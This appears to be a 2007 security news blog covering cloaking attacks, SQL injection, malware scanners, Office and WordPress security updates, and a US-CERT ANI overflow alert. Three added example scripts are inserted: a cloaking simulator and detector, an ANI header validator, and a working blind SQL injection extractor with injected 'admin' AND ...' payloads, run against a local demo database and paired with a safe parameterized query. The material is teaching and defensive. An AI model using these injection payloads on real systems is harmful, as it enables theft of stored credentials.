Hackers Use New Evasive Techniques to Avoid Malware Detection

June 5th, 2007

Hackers are developing increasingly stealthy techniques to evade detection. The attacks place malicious code on web sites and keep track of the IP addresses that have visited the infected pages; if the same IP address requests the malicious page again, benign content is served instead.

The attacks are also capable of identifying “the IP addresses of web crawlers used by URL filtering, reputation services and search engines,” and serve legitimate content to avoid being identified as malicious.

Recent findings reveal that hackers have created a new class of highly evasive attacks, a marked step up in sophistication that goes well beyond drive-by downloads and code obfuscation.

The combination of these evasive attacks with code obfuscation techniques significantly enhances the capability of sophisticated hackers to go undetected.
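The behaviour described above, as an added example that is not part of the original article or of Finjan's research: a simulated server that hands out exploit content once per IP and benign content on any revisit or to a crawler range, beside the check an analyst needs. A single re-fetch from the same box sees only the clean page, so the comparison has to use a fresh IP plus a crawler-range IP, and the one body that looked malicious must be kept because it cannot be reproduced. The IP ranges, page bodies and fetch function are constructed in-process; nothing touches the network.

```python
"""IP-aware cloaking, modelled in-process, and a multi-vantage check for it.

Added example; the server logic, IP addresses and page bodies below are
constructed for illustration and are not taken from the article.
"""

# Constructed: addresses the simulated attacker treats as crawler or
# reputation-service ranges (not real allocations of any vendor).
KNOWN_SCANNER_IPS = {"66.249.66.1", "64.4.8.1"}
MALICIOUS = "<script>/* exploit stub */</script>"
BENIGN = "<p>Welcome to our site</p>"


class CloakingServer:
    """Serves MALICIOUS to a first-time visitor, BENIGN to anyone who has
    visited before and to anything in the scanner list."""

    def __init__(self, scanner_ips=KNOWN_SCANNER_IPS):
        self.seen = set()
        self.scanner_ips = set(scanner_ips)

    def get(self, client_ip):
        if client_ip in self.scanner_ips or client_ip in self.seen:
            return BENIGN
        self.seen.add(client_ip)
        return MALICIOUS


def naive_recheck(server, analyst_ip):
    """What an analyst sees by fetching twice from the same box:
    the second fetch is clean even though the site is malicious."""
    first = server.get(analyst_ip)
    second = server.get(analyst_ip)
    return first, second


def detect_cloaking(server, fresh_ip, crawler_ip):
    """Three fetches: a never-seen IP, an immediate revisit from that
    same IP, and a crawler-range IP. Any disagreement between the bodies
    is a cloaking indicator. The first body is returned so it can be
    archived; on a cloaking site it will not be served again."""
    first = server.get(fresh_ip)
    revisit = server.get(fresh_ip)
    crawler = server.get(crawler_ip)
    indicators = []
    if first != revisit:
        indicators.append("body changed on immediate revisit from same IP")
    if first != crawler:
        indicators.append("body differs for crawler-range IP")
    return {
        "first": first,
        "revisit": revisit,
        "crawler": crawler,
        "cloaked": bool(indicators),
        "indicators": indicators,
    }


if __name__ == "__main__":
    srv = CloakingServer()
    print(naive_recheck(srv, "203.0.113.7"))   # (exploit, benign)
    print(detect_cloaking(CloakingServer(), "203.0.113.8", "66.249.66.1"))
```

The check has an obvious blind spot: if the vantage IP has already touched the site (an earlier manual visit, a previous scan run), every fetch agrees on the benign body and the verdict is clean. Rotating to genuinely fresh addresses for each assessment is the only fix the model allows.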

A follow-up study conducted by Finjan’s Malicious Code Research Centre warns of the growing presence of malicious code in online advertising.

More info at: VNUNet

How A Hacker Launches A Blind SQL Injection Attack!

June 2nd, 2007

 SPI Dynamics

It’s been estimated that three-fourths of today’s successful system hacks are perpetrated not via network security flaws but by entering directly through the “front door”: exploiting vulnerabilities in customer-facing web applications.

Grab a copy of SPI Dynamics’ free SQL Injection white paper, “SQL Injection: Are Your Web Applications Vulnerable?”, to understand and prevent SQL Injection attacks today!
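A worked example of the blind technique the post title refers to, added here and not taken from the SPI Dynamics white paper. The application exposes nothing but a yes/no answer (does this user exist?), which is enough: the attacker closes the quoted name, appends an AND condition on another column, and reads the secret one question at a time. The same payloads are then run against a parameterized version of the query. The users table, the admin row and its secret are constructed inline so the script runs offline against an in-memory SQLite database.

```python
"""Boolean-based blind SQL injection, beside the bound-parameter query
that defeats it.

Added example; not from SPI Dynamics. Schema, rows and the secret are
constructed here for illustration.
"""
import sqlite3

SECRET = "s3cr3t"  # constructed: the value the attacker wants to read
CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', ?)", (SECRET,))
    return conn


def user_exists_vulnerable(conn, name):
    """Blind setting: the caller learns only True/False, never an error
    text or a row. The name is spliced straight into the SQL string."""
    sql = "SELECT 1 FROM users WHERE name = '%s'" % name
    return conn.execute(sql).fetchone() is not None


def user_exists_safe(conn, name):
    """Same check with a bound parameter: the input is data, never SQL."""
    sql = "SELECT 1 FROM users WHERE name = ?"
    return conn.execute(sql, (name,)).fetchone() is not None


def extract_password(oracle, max_len=32):
    """Recover admin's password through a yes/no oracle.

    Every payload is "admin' AND <condition>" where <condition> ends
    with an unterminated string literal; the template's own closing
    quote completes it, so no comment marker is needed and the query
    stays syntactically valid. Returns (recovered_value, probe_count).
    """
    probes = 0

    def ask(condition):
        nonlocal probes
        probes += 1
        return oracle("admin' AND " + condition)

    # Step 1: length. The numeric test is followed by a dummy string
    # comparison so the trailing quote from the template is consumed.
    length = 0
    for n in range(1, max_len + 1):
        if ask("length(password) = %d AND '' = '" % n):
            length = n
            break

    # Step 2: one character per position, one probe per candidate.
    recovered = ""
    for pos in range(1, length + 1):
        for c in CHARSET:
            if ask("substr(password, %d, 1) = '%s" % (pos, c)):
                recovered += c
                break
    return recovered, probes


if __name__ == "__main__":
    db = make_db()
    print(extract_password(lambda p: user_exists_vulnerable(db, p)))
    print(extract_password(lambda p: user_exists_safe(db, p)))
```

Against the string-built query the loop recovers the secret in a few hundred requests with nothing in the responses but "found"/"not found"; against the bound-parameter query every probe is treated as a literal user name, no row matches, and the extraction returns an empty string. The request pattern itself (one host issuing many near-identical requests whose bodies differ only in a counter or a single character) is what a WAF or log review can key on.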

Who is lurking in your computer? Find out.

June 1st, 2007

Panda Malware Radar

 

Viruses and threats are changing.

They are now more dangerous than ever. They are more discreet. They are faster. They are frequently designed to steal confidential information or money. They can even be ‘tailor-made’ to target each victim.

Malware Radar is a new scanning technology developed by Panda Software. Malware Radar has found banks, Fortune 500 companies, small businesses, and even government agencies infected with hidden malicious programs actively stealing information despite being “protected” by what they thought were the best antivirus and Internet security measures available.

Fast, comprehensive, and easy to use:

  •     Works online - nothing to install
  •     Finds and completely removes hidden malware
  •     Works with all antivirus and security programs (does NOT replace them)
  •     Leaves no trace on system after scan
  •     Produces full comprehensive reports on system vulnerabilities and malware found

Take Malware Radar for a spin to get an automated malware audit.

Microsoft Office 2003 Security Tool Protects Users from Infected Files

May 29th, 2007

Microsoft has released a free tool called the Microsoft Office Isolated Conversion Environment, or MOICE, to help protect users from malware embedded in Office files, an attack vector that has recently gained popularity.

MOICE converts Word, Excel and PowerPoint documents to their Open XML counterparts and performs the conversion in a sandboxed environment, so that payloads embedded in the binary file to exploit holes in Microsoft Office are not handled by the user’s normal Office process.

MOICE works in tandem with File Block, a feature that allows administrators to set group policies governing which file types users may open. Both work out of the box with Microsoft Office 2007.

Microsoft Office 2003 users need to install the Compatibility Pack for Word, Excel and PowerPoint 2007 Office File Formats first. 

There is currently no protection offered for users running versions prior to Microsoft Office 2003.

http://support.microsoft.com/kb/935865

WordPress Releases v2.2, Codenamed Getz

May 17th, 2007

This version includes a number of new features, most notably Widgets integration, and over two hundred bug fixes. It’s named in honor of tenor saxophonist Stan Getz.

Goodies:

  • WordPress Widgets allow you to easily rearrange and customize areas of your weblog (usually sidebars) with drag-and-drop simplicity. This functionality was originally available as a plugin; Widgets are now included by default in the core code, significantly cleaned up, and enabled for the default themes.
  • Full Atom support, including updating our Atom feeds to use the 1.0 standard spec and including an implementation of the Atom Publishing API to complement our XML-RPC interface.
  • A new Blogger importer that is able to handle the latest version of Google’s Blogger product and seamlessly import posts and comments without any user interaction beyond entering your login.
  • Infinite comment stream, meaning that on your Edit Comments page when you delete or spam a comment using the AJAX links under each comment it will bring in another comment in the background so you always have 20 items on the page. (I know it sounds geeky, but try it!)
  • We now protect you from activating a plugin or editing a file that will break your blog.
  • Core plugin and filter speed optimizations should make everything feel a bit more snappy and lighter on your server.
  • We’ve added a hook for WYSIWYG support in a future version of Safari.

In addition there were also dozens of UI and accessibility improvements, ranging from more concise wording around options and links to things like a view and preview link above the content box when you’re editing a post or page, as well as several important security fixes. 

WordPress will no longer support the 2.1 branch, so this is a required upgrade.

Download Wordpress v2.2 Codename Getz.

Update to WordPress 2.1.3 and 2.0.10 Provides Security Fixes

April 3rd, 2007

This just in from WordPress a while ago…

We have a security update release for both the 2.1 and 2.0 branches of WordPress now available for immediate download. This update is highly recommended for all users of both branches.

These releases include fixes for several publicly known minor XSS issues, one major XML-RPC issue, and a proactive full sweep of the WordPress codebase to protect against future problems.

It isn’t April 1 anymore so this probably is the real thing. Make sure you guys update to this new version since it provides some important security fixes which if left unpatched will surely be easy to exploit.

Don’t forget to backup and test your backups first ;-) Good luck!

Microsoft Releases Threat Analysis & Modeling v2.1.2

April 1st, 2007

The Microsoft Threat Analysis & Modeling tool allows subject-matter experts who are not security specialists to enter information they already have, such as business requirements and application architecture, which is then used to produce a feature-rich threat model. Along with automatically identifying threats, the tool can produce valuable security artifacts such as:

- Data access control matrix
- Component access control matrix
- Subject-object matrix
- Data Flow
- Call Flow
- Trust Flow
- Attack Surface
- Focused reports

Download from Microsoft

US-CERT Advisory - Microsoft Windows ANI Header Stack Buffer Overflow

March 31st, 2007

National Cyber Alert System
Technical Cyber Security Alert TA07-089A
Microsoft Windows ANI header stack buffer overflow

Original release date: March 30, 2007
Last revised: –
Source: US-CERT

Systems Affected

Microsoft Windows 2000, XP, Server 2003, and Vista are affected. Applications that provide attack vectors include:

* Microsoft Internet Explorer
* Microsoft Outlook
* Microsoft Outlook Express
* Microsoft Windows Mail
* Microsoft Windows Explorer
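The alert above names a stack buffer overflow in the handling of the ANI header. As an added check, not part of the US-CERT alert and not an exploit, the following script walks the RIFF chunk tree of a .ani file and reports every anih chunk whose declared size is not the fixed 36-byte ANIHEADER. It assumes only the public ANI layout (a RIFF container of form type ACON, with an anih chunk carrying nine 32-bit header fields); the sample files are constructed in code, not captured from the wild.

```python
"""Structural check for .ani files: flag any anih chunk whose declared
size is not the 36-byte ANIHEADER, at any nesting depth.

Added example; not from US-CERT. Assumption: ANIHEADER is exactly
nine 32-bit fields (36 bytes), so a different declared length is
malformed at best. Sample files below are constructed here.
"""
import struct

ANIHEADER_SIZE = 36


def iter_chunks(data, start, end):
    """Yield (fourcc, payload_offset, declared_size) for each RIFF chunk
    in data[start:end]. A chunk whose declared size runs past the end
    is still yielded once, then iteration stops."""
    pos = start
    while pos + 8 <= end:
        fourcc = data[pos:pos + 4]
        size = struct.unpack_from("<I", data, pos + 4)[0]
        yield fourcc, pos + 8, size
        pos += 8 + size + (size & 1)  # RIFF chunks are word-aligned


def find_bad_anih(data):
    """Return [(chunk_offset, declared_size), ...] for every anih chunk
    whose size is not ANIHEADER_SIZE. Recurses into LIST chunks so a
    header hidden inside a frame list is examined too. Raises
    ValueError if the bytes are not a RIFF/ACON container."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"ACON":
        raise ValueError("not an ANI (RIFF/ACON) file")
    findings = []

    def walk(start, end):
        for fourcc, off, size in iter_chunks(data, start, end):
            if fourcc == b"anih" and size != ANIHEADER_SIZE:
                findings.append((off - 8, size))
            elif fourcc == b"LIST":
                walk(off + 4, min(off + size, end))  # skip the list type

    walk(12, len(data))
    return findings


# --- constructed samples -------------------------------------------------

def chunk(fourcc, payload):
    pad = b"\0" if len(payload) & 1 else b""
    return fourcc + struct.pack("<I", len(payload)) + payload + pad


def riff_acon(*chunks):
    body = b"ACON" + b"".join(chunks)
    return b"RIFF" + struct.pack("<I", len(body)) + body


# cbSize, cFrames, cSteps, cx, cy, cBitCount, cPlanes, JifRate, flags
VALID_HEADER = struct.pack("<9I", 36, 1, 1, 32, 32, 32, 1, 10, 1)

GOOD_ANI = riff_acon(chunk(b"anih", VALID_HEADER))

# A well-formed first header followed by a LIST holding a second anih
# that claims 128 bytes: the case a first-chunk-only check would miss.
BAD_ANI = riff_acon(
    chunk(b"anih", VALID_HEADER),
    chunk(b"LIST", b"fram" + chunk(b"anih", b"A" * 128)),
)


if __name__ == "__main__":
    print("good:", find_bad_anih(GOOD_ANI))
    print("bad: ", find_bad_anih(BAD_ANI))
```

The check deliberately inspects every anih chunk at every depth rather than stopping at the first one, and it reads the declared size without trusting it for anything other than advancing to the next chunk, so a huge value cannot make the scanner itself misbehave. It is a triage filter for mail gateways or file shares, not a substitute for the Microsoft patch.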

NSA Issues New Security Guidelines for Mac OS X

March 23rd, 2007

The National Security Agency (NSA) has published version 2 of its security guidelines for Mac OS X. The security documents are available in PDF format on the OS Guides page for Mac OS X.

These documents for Mac OS X and Mac OS X Server represent best practices for securing the OS and are widely used in industry as internal standards for configuring Mac OS X. The documents were actually written by experts at Apple and endorsed by the NSA, which says on its website: “It is our belief that these guides establish the latest best practices for securing the products and recommend that traditional customers of our security recommendations use the Apple guides when securing Macintosh OS X 10.4.x and Macintosh OS X Server 10.4.x.”

Practices covered include setting up admin accounts, generating passwords, the proper way to remove Classic (which can be a serious security problem for Mac OS X), managing the root account, and the use of Access Control Lists (ACLs).

Out of the box, Mac OS X is fairly secure, especially with respect to closed ports. However, for those in the enterprise who want to take advantage of every feature of Mac OS X to lock down and secure the OS against not only network but local intrusions, this is a must read.

http://www.nsa.gov/snac/downloads_macOSX10_4Server.cfm?MenuID=scg10.3.1.1

Microsoft Releases Windows Defender 7

March 16th, 2007

Microsoft on Thursday released an upgrade to its Windows Defender application, raising the version number from 1.1 to 7.0. The reason behind the version change is not clear, although the release does bring a redesigned user interface and new malware detection engine.

Windows Defender supports 64-bit operating systems but no longer runs on Windows 2000, because, Microsoft says, the aging operating system has left mainstream support. Windows Genuine Advantage (WGA) checking will also be enforced, meaning that Windows Defender will only remove “Severe” threats from computers that do not pass validation.

System Requirements:
- Supported Operating Systems: Windows Server 2003 Service Pack 1; Windows XP Service Pack 2
- Windows Defender no longer supports Windows 2000 as it went out of mainstream support in June 2005.